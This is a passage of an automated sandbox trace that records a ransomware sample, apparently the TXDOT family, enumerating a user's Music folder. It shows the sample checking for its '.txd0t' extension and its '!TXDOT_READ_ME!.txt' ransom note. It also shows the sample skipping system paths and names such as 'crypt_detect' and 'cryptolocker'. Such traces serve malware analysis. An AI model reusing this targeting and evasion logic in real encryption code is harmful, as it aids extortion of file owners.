lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53f37ef0, ftCreationTime.dwHighDateTime=0x1d5e7f8, ftLastAccessTime.dwLowDateTime=0x51c0731b, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51c0731b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.810] StrCmpW (psz1="..", psz2=".") returned 1 [0119.810] StrCmpW (psz1="..", psz2="..") returned 0 [0119.810] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51b94cac, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51b94cac, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51bbadbb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.810] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.810] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.810] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0119.810] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", psz2="\\", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\" [0119.810] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\!TXDOT_READ_ME!.txt" [0119.810] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.811] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.811] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.811] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.811] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.811] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.811] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.811] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.811] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.811] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.811] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.811] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.811] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.811] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.817] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.817] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.817] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee4d8020, ftCreationTime.dwHighDateTime=0x1d5e764, ftLastAccessTime.dwLowDateTime=0xe32ee490, ftLastAccessTime.dwHighDateTime=0x1d5eb06, ftLastWriteTime.dwLowDateTime=0x51b94cac, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x2b3c, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="KXtDlQHWMbiCZ2hHs6x.m4a.txd0t", cAlternateFileName="KXTDLQ~1.TXD")) returned 1 [0119.817] StrCmpW (psz1="KXtDlQHWMbiCZ2hHs6x.m4a.txd0t", psz2=".") returned 1 [0119.817] StrCmpW (psz1="KXtDlQHWMbiCZ2hHs6x.m4a.txd0t", psz2="..") returned 1 [0119.817] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0119.817] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", psz2="\\", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\" [0119.817] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\", psz2="KXtDlQHWMbiCZ2hHs6x.m4a.txd0t", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a.txd0t" [0119.817] PathFindExtensionW (pszPath="KXtDlQHWMbiCZ2hHs6x.m4a.txd0t") returned=".txd0t" [0119.817] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.817] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61010020, ftCreationTime.dwHighDateTime=0x1d5e6f1, ftLastAccessTime.dwLowDateTime=0x203b5a50, ftLastAccessTime.dwHighDateTime=0x1d5ef15, ftLastWriteTime.dwLowDateTime=0x51be116e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7fd1, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="pEnlGp0QjdthKZA-Yo5o.mp3.txd0t", cAlternateFileName="PENLGP~1.TXD")) returned 1 [0119.817] StrCmpW (psz1="pEnlGp0QjdthKZA-Yo5o.mp3.txd0t", psz2=".") returned 1 [0119.817] StrCmpW (psz1="pEnlGp0QjdthKZA-Yo5o.mp3.txd0t", psz2="..") returned 1 [0119.817] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0119.817] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", psz2="\\", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\" [0119.817] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\", psz2="pEnlGp0QjdthKZA-Yo5o.mp3.txd0t", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3.txd0t" [0119.817] PathFindExtensionW (pszPath="pEnlGp0QjdthKZA-Yo5o.mp3.txd0t") returned=".txd0t" [0119.818] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.818] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f2e37b0, ftCreationTime.dwHighDateTime=0x1d5ec02, ftLastAccessTime.dwLowDateTime=0xacd5dae0, ftLastAccessTime.dwHighDateTime=0x1d5e3c0, ftLastWriteTime.dwLowDateTime=0x51c0731b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x2cb0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="ZwNcr2UV.mp3.txd0t", cAlternateFileName="ZWNCR2~1.TXD")) returned 1 [0119.818] StrCmpW (psz1="ZwNcr2UV.mp3.txd0t", psz2=".") returned 1 [0119.818] StrCmpW (psz1="ZwNcr2UV.mp3.txd0t", psz2="..") returned 1 [0119.818] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0119.818] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", psz2="\\", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\" [0119.818] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\", psz2="ZwNcr2UV.mp3.txd0t", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3.txd0t" [0119.818] PathFindExtensionW (pszPath="ZwNcr2UV.mp3.txd0t") returned=".txd0t" [0119.818] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.818] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f2e37b0, ftCreationTime.dwHighDateTime=0x1d5ec02, ftLastAccessTime.dwLowDateTime=0xacd5dae0, ftLastAccessTime.dwHighDateTime=0x1d5e3c0, ftLastWriteTime.dwLowDateTime=0x51c0731b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x2cb0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="ZwNcr2UV.mp3.txd0t", cAlternateFileName="ZWNCR2~1.TXD")) returned 0 [0119.818] FindClose (in: hFindFile=0xec19b0 | out: hFindFile=0xec19b0) returned 1 [0119.818] GetProcessHeap () returned 0xe30000 [0119.818] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xe30000) returned 1 [0119.818] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1082d280, ftCreationTime.dwHighDateTime=0x1d5e2d8, ftLastAccessTime.dwLowDateTime=0xc5bdf750, ftLastAccessTime.dwHighDateTime=0x1d5e2ca, ftLastWriteTime.dwLowDateTime=0x51c0731b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1089c, dwReserved0=0x741, dwReserved1=0x0, cFileName="Ph7y_8.m4a.txd0t", cAlternateFileName="PH7Y_8~1.TXD")) returned 1 [0119.818] StrCmpW (psz1="Ph7y_8.m4a.txd0t", psz2=".") returned 1 [0119.818] StrCmpW (psz1="Ph7y_8.m4a.txd0t", psz2="..") returned 1 [0119.818] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0119.818] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\" [0119.818] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\", psz2="Ph7y_8.m4a.txd0t", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a.txd0t" [0119.818] PathFindExtensionW (pszPath="Ph7y_8.m4a.txd0t") returned=".txd0t" [0119.818] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.818] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb523a730, ftCreationTime.dwHighDateTime=0x1d5e9b6, ftLastAccessTime.dwLowDateTime=0xe6d8b110, ftLastAccessTime.dwHighDateTime=0x1d5e1a2, ftLastWriteTime.dwLowDateTime=0x51c2d4bd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7468, dwReserved0=0x741, dwReserved1=0x0, cFileName="Pq-yXja0.m4a.txd0t", cAlternateFileName="PQ-YXJ~1.TXD")) returned 1 [0119.818] StrCmpW (psz1="Pq-yXja0.m4a.txd0t", psz2=".") returned 1 [0119.818] StrCmpW (psz1="Pq-yXja0.m4a.txd0t", psz2="..") returned 1 [0119.818] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0119.818] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\" [0119.818] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\", psz2="Pq-yXja0.m4a.txd0t", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a.txd0t" [0119.818] PathFindExtensionW (pszPath="Pq-yXja0.m4a.txd0t") returned=".txd0t" [0119.818] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.818] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f9103d0, ftCreationTime.dwHighDateTime=0x1d5ed7e, ftLastAccessTime.dwLowDateTime=0x51d2c0b0, ftLastAccessTime.dwHighDateTime=0x1d5e98b, ftLastWriteTime.dwLowDateTime=0x51c5385c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13397, dwReserved0=0x741, dwReserved1=0x0, cFileName="zaYdv7kbUlcUxSz3KeA-.wav.txd0t", cAlternateFileName="ZAYDV7~1.TXD")) returned 1 [0119.819] StrCmpW (psz1="zaYdv7kbUlcUxSz3KeA-.wav.txd0t", psz2=".") returned 1 [0119.819] StrCmpW (psz1="zaYdv7kbUlcUxSz3KeA-.wav.txd0t", psz2="..") returned 1 [0119.819] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0119.819] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\" [0119.819] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\", psz2="zaYdv7kbUlcUxSz3KeA-.wav.txd0t", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav.txd0t" [0119.819] PathFindExtensionW (pszPath="zaYdv7kbUlcUxSz3KeA-.wav.txd0t") returned=".txd0t" [0119.819] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.819] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f9103d0, ftCreationTime.dwHighDateTime=0x1d5ed7e, ftLastAccessTime.dwLowDateTime=0x51d2c0b0, ftLastAccessTime.dwHighDateTime=0x1d5e98b, ftLastWriteTime.dwLowDateTime=0x51c5385c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13397, dwReserved0=0x741, dwReserved1=0x0, cFileName="zaYdv7kbUlcUxSz3KeA-.wav.txd0t", cAlternateFileName="ZAYDV7~1.TXD")) returned 0 [0119.819] FindClose (in: hFindFile=0xec2030 | out: hFindFile=0xec2030) returned 1 [0119.819] GetProcessHeap () returned 0xe30000 [0119.819] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0119.819] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd178d9f0, ftCreationTime.dwHighDateTime=0x1d5ea4c, ftLastAccessTime.dwLowDateTime=0xf27b55d0, ftLastAccessTime.dwHighDateTime=0x1d5e0d6, ftLastWriteTime.dwLowDateTime=0x51c79a1b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x8da5, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="fXQDJP18MMdWjvedkW4.mp3.txd0t", cAlternateFileName="FXQDJP~1.TXD")) returned 1 [0119.819] StrCmpW (psz1="fXQDJP18MMdWjvedkW4.mp3.txd0t", psz2=".") returned 1 [0119.819] StrCmpW (psz1="fXQDJP18MMdWjvedkW4.mp3.txd0t", psz2="..") returned 1 [0119.819] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0119.819] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0119.819] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="fXQDJP18MMdWjvedkW4.mp3.txd0t", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3.txd0t" [0119.819] PathFindExtensionW (pszPath="fXQDJP18MMdWjvedkW4.mp3.txd0t") returned=".txd0t" [0119.819] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.819] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa0c2db0, ftCreationTime.dwHighDateTime=0x1d5ef72, ftLastAccessTime.dwLowDateTime=0x51ca166c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51ca166c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="JI_ROcYP5iaMyIhA11bQ", cAlternateFileName="JI_ROC~1")) returned 1 [0119.819] StrCmpW (psz1="JI_ROcYP5iaMyIhA11bQ", psz2=".") returned 1 [0119.819] StrCmpW (psz1="JI_ROcYP5iaMyIhA11bQ", psz2="..") returned 1 [0119.819] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0119.819] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0119.819] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="JI_ROcYP5iaMyIhA11bQ", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ" [0119.819] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\windows\\system32\\") returned 0x0 [0119.819] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.819] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\windows\\system\\") returned 0x0 [0119.819] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.819] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.819] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\appdata\\local\\") returned 0x0 [0119.819] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.820] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.820] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.820] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\boot\\") returned 0x0 [0119.820] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\perflogs\\") returned 0x0 [0119.820] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\programdata\\") returned 0x0 [0119.820] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\drivers\\") returned 0x0 [0119.820] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\wsus\\") returned 0x0 [0119.820] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.820] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.820] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="crypt_detect") returned 0x0 [0119.820] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="cryptolocker") returned 0x0 [0119.820] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="ransomware") returned 0x0 [0119.820] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="C:\\WINDOWS") returned 0x0 [0119.820] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.820] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="C:\\Program Files") returned 0x0 [0119.820] GetProcessHeap () returned 0xe30000 [0119.820] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d6) returned 0xed39f8 [0119.820] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ" [0119.820] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", psz2="\\*", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\*") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\*" [0119.820] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\*", lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa0c2db0, ftCreationTime.dwHighDateTime=0x1d5ef72, ftLastAccessTime.dwLowDateTime=0x51ca166c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51ca166c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2030 [0119.820] StrCmpW (psz1=".", psz2=".") returned 0 [0119.820] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa0c2db0, ftCreationTime.dwHighDateTime=0x1d5ef72, ftLastAccessTime.dwLowDateTime=0x51ca166c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51ca166c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.820] StrCmpW (psz1="..", psz2=".") returned 1 [0119.820] StrCmpW (psz1="..", psz2="..") returned 0 [0119.820] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51c79a1b, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51c79a1b, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51ca166c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.820] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.820] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.820] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ") 